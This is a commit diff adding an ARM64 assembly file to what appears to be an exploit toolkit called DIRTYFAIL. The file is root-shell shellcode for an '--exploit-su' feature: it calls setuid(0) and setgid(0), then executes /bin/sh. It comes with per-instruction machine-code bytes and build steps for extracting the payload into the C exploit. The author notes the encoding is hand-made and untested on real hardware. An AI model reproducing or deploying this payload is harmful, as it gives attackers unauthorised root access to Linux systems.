Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL

modules/copy_fail_family/tools/exploit_su_aarch64.S

@@ -0,0 +1,73 @@
+/*
+ * DIRTYFAIL — aarch64 (ARM64) shellcode for --exploit-su
+ *
+ * Equivalent to the x86_64 shellcode in src/exploit_su.c but encoded
+ * for the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
+ * `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes total.
+ *
+ * Build for byte-extraction:
+ *
+ *   aarch64-linux-gnu-as -o exploit_su_aarch64.o exploit_su_aarch64.S
+ *   aarch64-linux-gnu-objcopy -O binary -j .text \
+ *     exploit_su_aarch64.o exploit_su_aarch64.bin
+ *   xxd -i exploit_su_aarch64.bin
+ *
+ * The resulting byte array should match `shellcode_aarch64[]` in
+ * `src/exploit_su.c`. If it doesn't, the C array is wrong and needs
+ * to be regenerated from this source.
+ *
+ * Functional equivalent (in C-like pseudocode):
+ *
+ *     setuid(0);
+ *     setgid(0);
+ *     execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL);
+ *
+ * STATUS: HAND-ENCODED — VERIFY BEFORE DEPLOYING TO PRODUCTION.
+ * The byte array in src/exploit_su.c was produced by manually
+ * cross-referencing each instruction against the ARMv8-A reference
+ * manual; no aarch64 hardware was available to run the resulting
+ * shellcode end-to-end. Use this .S file to regenerate via the
+ * assembler if you need confidence.
+ */
+
+.text
+.global _start
+_start:
+    /* setuid(0) — syscall 146 (0x92) on aarch64 */
+    movz    x0, #0                       /* d2 80 00 00 */
+    movz    x8, #146                     /* d2 80 12 48 */
+    svc     #0                           /* d4 00 00 01 */
+
+    /* setgid(0) — syscall 144 (0x90) */
+    movz    x0, #0                       /* d2 80 00 00 */
+    movz    x8, #144                     /* d2 80 12 08 */
+    svc     #0                           /* d4 00 00 01 */
+
+    /* Build "/bin/sh\0" in x9.
+     *
+     * As a 64-bit little-endian word, "/bin/sh\0" = 0x0068732f6e69622f
+     *   bits  0..15 = 0x622f  (chars '/' 'b' in low->high order)
+     *   bits 16..31 = 0x6e69
+     *   bits 32..47 = 0x732f
+     *   bits 48..63 = 0x0068
+     */
+    movz    x9, #0x622f                  /* d2 8c 45 e9 */
+    movk    x9, #0x6e69, lsl #16         /* f2 ad cd 29 */
+    movk    x9, #0x732f, lsl #32         /* f2 ce 65 e9 */
+    movk    x9, #0x0068, lsl #48         /* f2 e0 0d 09 */
+
+    /* Push the string to the stack (sp -= 16; [sp] = x9). */
+    str     x9, [sp, #-16]!              /* f8 1f 0f e9 */
+    mov     x9, sp                       /* 91 00 03 e9 — string ptr */
+
+    /* Build argv = [x9, NULL] on the stack: sp -= 16; sp[0] = x9; sp[8] = NULL. */
+    sub     sp, sp, #16                  /* d1 00 43 ff */
+    str     xzr, [sp, #8]                /* f9 00 07 ff — argv[1] = NULL */
+    str     x9, [sp, #0]                 /* f9 00 03 e9 — argv[0] = ptr */
+
+    /* execve(pathname=x9, argv=sp, envp=NULL) — syscall 221 (0xdd) */
+    mov     x0, x9                       /* aa 09 03 e0 */
+    mov     x1, sp                       /* 91 00 03 e1 */
+    mov     x2, xzr                      /* aa 1f 03 e2 */
+    movz    x8, #221                     /* d2 80 1b a8 */
+    svc     #0                           /* d4 00 00 01 */